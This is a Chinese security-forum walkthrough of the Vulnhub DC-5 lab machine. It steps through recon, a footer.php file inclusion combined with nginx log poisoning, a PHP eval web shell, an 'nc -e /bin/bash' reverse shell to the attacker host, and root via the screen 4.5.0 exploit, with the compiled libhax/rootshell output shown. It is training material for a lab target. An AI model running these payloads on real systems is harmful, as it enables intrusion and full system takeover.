首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 看雪峰会 看雪商城 证书查询
  1. 社区
  2. WEB安全
    3. 发新帖
[原创]小蜘蛛带你一起学习DC-5
发表于: 2021-2-21 12:35 5017

[原创]小蜘蛛带你一起学习DC-5

安全小蜘蛛 活跃值
2021-2-21 12:35
5017

Vunlnhub靶机DC-5

 

*注:请严格遵守网络安全法,本文章以培养网络安全人才为核心。

 

目录
DC-5 靶机实战(DC-)

DC-5 靶机

信息收集

嗅探靶机IP

1
arp-scan -l

图片描述

使用nmap对靶机进行扫描

1
nmap -A -p- -sV -o -T4  10.10.10.218

图片描述 图片描述

访问网页

图片描述
打开Contact页面,发现可以提交留言
我们可以随便填写,提交试一试
图片描述
图片描述
图片描述

从提交两次的结果来看,并没有什么特别,但是我们仔细观察发现,网页的底部标签发生了两次的变化。

使用brupstuite抓包,爆破目录

不要忘记打开浏览器代理

 

图片描述
图片描述
图片描述
kali自带目录爆破字典文件位置: /usr/share/wordlists/dirb/big.txt
图片描述
图片描述

文件包含漏洞

图片描述

确认文件包含页面是footer.php
然后去判断参数(file 基本上都是这个) 尝试读取到/etc/passwd

 

图片描述

nginx日志文件包含

既然存在文件包含漏洞
试着读了下日志文件,nginx默认日志文件为/var/log/nginx/error.log

 

图片描述
已将木马写入到error.log中

使用蚁剑连接

图片描述

获取一个稳定的终端

图片描述
写入一句话木马

1
2
3
4
404
<?php
@eval($_REQUEST[999])
?>

再次使用蚁剑连接
图片描述
图片描述
图片描述

将shell反弹到kali中

1
2
kali: nc -lvvp 1234    #将kali开启监听
蚁剑:  nc -e /bin/bash 10.10.10.128 1234    #利用反弹shell

提权

获取一个交互的shell
图片描述

1
python -c 'import pty;pty.spawn("/bin/bash")'

sudo -l 看一下有没有命令具有root执行权限
图片描述
我们再看一下有没有具有suid权限的命令

1
find / -perm -u=s -type f 2>/dev/null

图片描述
以上的这些命令具有suid权限
我们可以看到screen 这个软件和它的版本好,那么这个软件再执行过程中会有suid权限

 

看一下这个软件是否存在漏洞

1
searchsploit screen 4.5.0

图片描述

1
cp /usr/share/exploitdb/exploits/linux/local/41154.sh 41154.sh

将漏洞发送到靶机中

1
python -m SimpleHTTPServer 8888  #在kali架设一个HTTP服务器,让远端系统拿到

dc5靶机进入到tmp目录下

1
wget http://10.10.10.128:8888/41154.sh

图片描述
执行漏洞脚本

1
2
chmod 777 41154.sh    #我们先给它最大权限
./41154.sh             #运行

图片描述
什么情况,我们先cat查看一下这个脚本

通过查看我们得知这个脚本需要编译,我们可以看着脚本的说明进行编译

编译漏洞脚本文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
root@rocky:~/screnn-dc# vim libhax.c
 
root@rocky:~/screnn-dc# gcc -fPIC -shared -ldl -o ./libhax.so ./libhax.c./libhax.c: In function ‘dropshell’:
./libhax.c:7:5: warning: implicit declaration of function ‘chmod’ [-Wimplicit-function-declaration]
    7 |     chmod("/tmp/rootshell", 04755);
      |     ^~~~~
root@rocky:~/screnn-dc# vim rootshell.c
root@rocky:~/screnn-dc# gcc -o ./rootshell ./rootshell.c
./rootshell.c: In function ‘main’:
./rootshell.c:3:5: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
    3 |     setuid(0);
      |     ^~~~~~
./rootshell.c:4:5: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration]
    4 |     setgid(0);
      |     ^~~~~~
./rootshell.c:5:5: warning: implicit declaration of function ‘seteuid’ [-Wimplicit-function-declaration]
    5 |     seteuid(0);
      |     ^~~~~~~
./rootshell.c:6:5: warning: implicit declaration of function ‘setegid’ [-Wimplicit-function-declaration]
    6 |     setegid(0);
      |     ^~~~~~~
./rootshell.c:7:5: warning: implicit declaration of function ‘execvp’ [-Wimplicit-function-declaration]
    7 |     execvp("/bin/sh", NULL, NULL);
      |     ^~~~~~
./rootshell.c:7:5: warning: too many arguments to built-in function ‘execvp’ expecting 2 [-Wbuiltin-declaration-mismatch]
root@rocky:~/screnn-dc# vim run.sh
root@rocky:~/screnn-dc# ls
libhax.c  libhax.so  rootshell  rootshell.c  run.sh

编译完成,我们将漏洞上传到dc5靶机中
还是老样子,在kali架设一个HTTP服务器,让远端系统拿到

 

kali

1
python -m SimpleHTTPServer 8888

dc5

1
2
3
wget http://10.10.10.128:80/run.sh
wget http://10.10.10.128:80/libhax.so
wget http://10.10.10.128:80/rootshell

图片描述

获取flag

1
./run.sh

图片描述
提权成功!

1
cat thisistheflag.txt #查看flag

图片描述


[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

最后于 2021-2-21 12:37 被安全小蜘蛛编辑 ,原因:
收藏
免费 0
支持
分享
最新回复 (1)
安全小蜘蛛
雪    币: 617
活跃值: (1331)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
私信
2

继续努力

最后于 2021-6-25 14:48 被安全小蜘蛛编辑 ,原因:
2021-2-25 20:53
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回
//